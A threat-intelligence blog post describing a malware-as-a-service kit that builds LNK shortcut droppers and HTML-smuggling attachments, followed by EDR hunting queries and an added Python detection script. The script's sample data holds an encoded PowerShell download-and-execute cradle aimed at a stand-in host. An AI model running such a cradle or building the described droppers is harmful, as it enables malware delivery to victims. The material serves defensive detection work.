
Malware-as-a-Service: New ‘Point-and-Click’ Kit Bypasses Security to Deliver Payloads via LNK and HTML
By CyberDudeBivash • October 04, 2025 • Threat Intelligence Report
cyberdudebivash.com | cyberbivash.blogspot.com
Disclosure: This is a technical threat analysis for security professionals. It contains affiliate links to relevant security solutions and training. Your support helps fund our independent research.
Threat Report: Table of Contents
- Chapter 1: The Industrialization of Hacking — The Rise of “Point-and-Click” MaaS
- Chapter 2: Threat Analysis Part 1 — The Automated LNK Dropper Builder
- Chapter 3: Threat Analysis Part 2 — The Automated HTML Smuggling Builder
- Chapter 4: The Defender’s Playbook — Hunting for EasySploit’s TTPs
Chapter 1: The Industrialization of Hacking — The Rise of “Point-and-Click” MaaS
The cybercrime ecosystem has undergone a dramatic professionalization. Sophisticated attack techniques are no longer the exclusive domain of elite state actors. They are now packaged, productized, and sold as a service. We are tracking a new Malware-as-a-Service (MaaS) platform, which we’re calling **“EasySploit,”** that exemplifies this trend. It provides a simple, graphical “point-and-click” web interface that allows even low-skilled criminals to generate highly evasive dropper files in seconds. This democratization of advanced TTPs is dramatically increasing the volume and sophistication of threats that security teams face every day.
Chapter 2: Threat Analysis Part 1 — The Automated LNK Dropper Builder
The first module of the EasySploit platform automates the creation of malicious LNK files, a TTP used by a wide range of malware, including the **SORVEPOTEL worm**.
The Criminal’s Workflow:
- The criminal subscribes to the EasySploit service.
- In the web UI, they simply paste the URL of their final payload (e.g., an infostealer hosted on a remote server).
- They click “Generate LNK.”
- The EasySploit backend automatically generates a PowerShell one-liner to download and execute the payload, encodes it in Base64, and embeds it into the “Target” field of a Windows Shortcut (.LNK) file.
- The criminal downloads the ready-to-use malicious LNK file and includes it in their phishing campaign.
Chapter 3: Threat Analysis Part 2 — The Automated HTML Smuggling Builder
The platform’s more advanced module automates **HTML Smuggling**, a powerful technique for bypassing network security gateways.
The Criminal’s Workflow:
- The criminal uploads their malicious payload (e.g., a ZIP or ISO file containing a RAT) to the EasySploit platform.
- They click “Generate HTML.”
- The backend service Base64-encodes the entire malicious file and embeds it inside a JavaScript “Blob” within a single HTML file.
- The criminal downloads this HTML file. When the victim receives and opens this “harmless” `.html` attachment, the JavaScript inside it reconstructs the malicious ISO/ZIP file from the Blob and triggers a download in the user’s browser, effectively “smuggling” it past the email gateway’s file-type filters.
Chapter 4: The Defender’s Playbook — Hunting for EasySploit’s TTPs
Because these techniques abuse legitimate system features, detection must focus on the behavioral anomalies they create. This requires a modern **Endpoint Detection and Response (EDR)** solution.
Key Hunting Queries for Your SOC:
- **To Detect the LNK Dropper:** Hunt for the parent-child relationship of the Windows shell launching PowerShell after a user clicks a shortcut.
  `ParentProcess:explorer.exe AND ProcessName:powershell.exe AND (CommandLine CONTAINS "-EncodedCommand" OR CommandLine CONTAINS "IEX")`
- **To Detect HTML Smuggling:** Hunt for a browser process creating an unusually large file or a suspicious file type.
  `Event_Type:FileCreation AND ProcessName IN ('chrome.exe', 'msedge.exe') AND FileExtension IN ('.iso', '.zip', '.img', '.vhd')`
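The two hunting rules above, as an added worked example that is not part of the original report: a small Python hunt over constructed EDR-style events. Beyond the queries, it decodes the argument of -EncodedCommand (Base64 of UTF-16LE text, and PowerShell also accepts the -enc and -e abbreviations) so the analyst sees the download cradle instead of only matching the flag. The event field names (type, parent, process, cmdline, path), the sample events and the addition of firefox.exe to the browser list are assumptions.

```python
import base64, os, re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
SMUGGLED_EXTS = {".iso", ".zip", ".img", ".vhd"}
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "invoke-webrequest")
# PowerShell accepts -EncodedCommand abbreviated to -enc or -e; the argument is Base64 of UTF-16LE text.
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def is_lnk_dropper(ev: dict) -> bool:
    """Shortcut click: explorer.exe spawns powershell.exe with an encoded or IEX command line."""
    key = (ev.get("type"), ev.get("parent", "").lower(), ev.get("process", "").lower())
    if key != ("ProcessCreate", "explorer.exe", "powershell.exe"):
        return False
    decoded = decode_encoded_command(ev.get("cmdline", ""))
    visible = (ev.get("cmdline", "") + " " + (decoded or "")).lower()  # hunt both forms
    return decoded is not None or any(marker in visible for marker in CRADLE_MARKERS)

def is_html_smuggling(ev: dict) -> bool:
    """Browser writing a container/disk-image type the mail gateway would have blocked."""
    if ev.get("type") != "FileCreation" or ev.get("process", "").lower() not in BROWSERS:
        return False
    return os.path.splitext(ev.get("path", ""))[1].lower() in SMUGGLED_EXTS

def hunt(events):
    """Return (rule, event_index) for every event that matches one of the two hunting rules."""
    rules = (("lnk_dropper", is_lnk_dropper), ("html_smuggling", is_html_smuggling))
    return [(name, i) for i, ev in enumerate(events) for name, rule in rules if rule(ev)]

# Constructed telemetry, not real logs. The cradle is encoded the way PowerShell expects it.
ENCODED_CRADLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://payload.invalid/s')".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "parent": "explorer.exe", "process": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc " + ENCODED_CRADLE},
    {"type": "ProcessCreate", "parent": "explorer.exe", "process": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},  # benign admin script
    {"type": "FileCreation", "process": "msedge.exe", "path": "C:\\Users\\u\\Downloads\\Invoice.iso"},
    {"type": "FileCreation", "process": "msedge.exe", "path": "C:\\Users\\u\\Downloads\\report.pdf"},
]
```

Running `hunt(SAMPLE_EVENTS)` flags only the encoded shortcut launch and the browser-written ISO; the signed admin script and the PDF download are left alone.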
Behavioral Defense is Key: An EDR platform is non-negotiable for detecting these modern, evasive techniques. **Kaspersky’s EDR/XDR solutions** are built to detect these malicious behaviors and TTPs, regardless of the specific payload or how the dropper was generated.
About the Author
CyberDudeBivash is a cybersecurity strategist with 15+ years in malware analysis, threat hunting, and reverse engineering, advising SOC teams and CISOs across APAC. [Last Updated: October 04, 2025]